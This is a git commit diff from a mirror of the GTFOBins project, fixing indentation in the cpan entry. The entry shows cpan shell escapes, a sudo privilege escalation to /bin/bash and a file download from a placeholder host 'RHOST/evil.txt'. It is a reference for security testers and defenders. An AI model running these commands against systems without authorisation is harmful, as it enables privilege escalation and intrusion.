mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
indentation fixes
This commit is contained in:
parent
b3a6e93b78
commit
e600a4e610
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- description: cpan lets you execute perl commands with `! command`
|
- description: cpan lets you execute perl commands with `! command`
|
||||||
code: |
|
code: |
|
||||||
$ cpan
|
$ cpan
|
||||||
cpan[1]> ! exec '/bin/bash'
|
cpan[1]> ! exec '/bin/bash'
|
||||||
@ -19,10 +19,10 @@ functions:
|
|||||||
cpan[1]> ! cpan[1]> ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
|
cpan[1]> ! cpan[1]> ! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();
|
||||||
|
|
||||||
file-download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
- description: Fetch a remote file via HTTP GET request and store it in PWD.
|
||||||
code: |
|
code: |
|
||||||
$ cpan
|
$ cpan
|
||||||
cpan[1]> ! use File::Fetch; my $file = (File::Fetch->new(uri => 'http://RHOST/evil.txt'))->fetch();
|
cpan[1]> ! use File::Fetch; my $file = (File::Fetch->new(uri => 'http://RHOST/evil.txt'))->fetch();
|
||||||
|
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
@ -30,4 +30,3 @@ functions:
|
|||||||
cpan[1]> ! exec '/bin/bash'
|
cpan[1]> ! exec '/bin/bash'
|
||||||
|
|
||||||
---
|
---
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user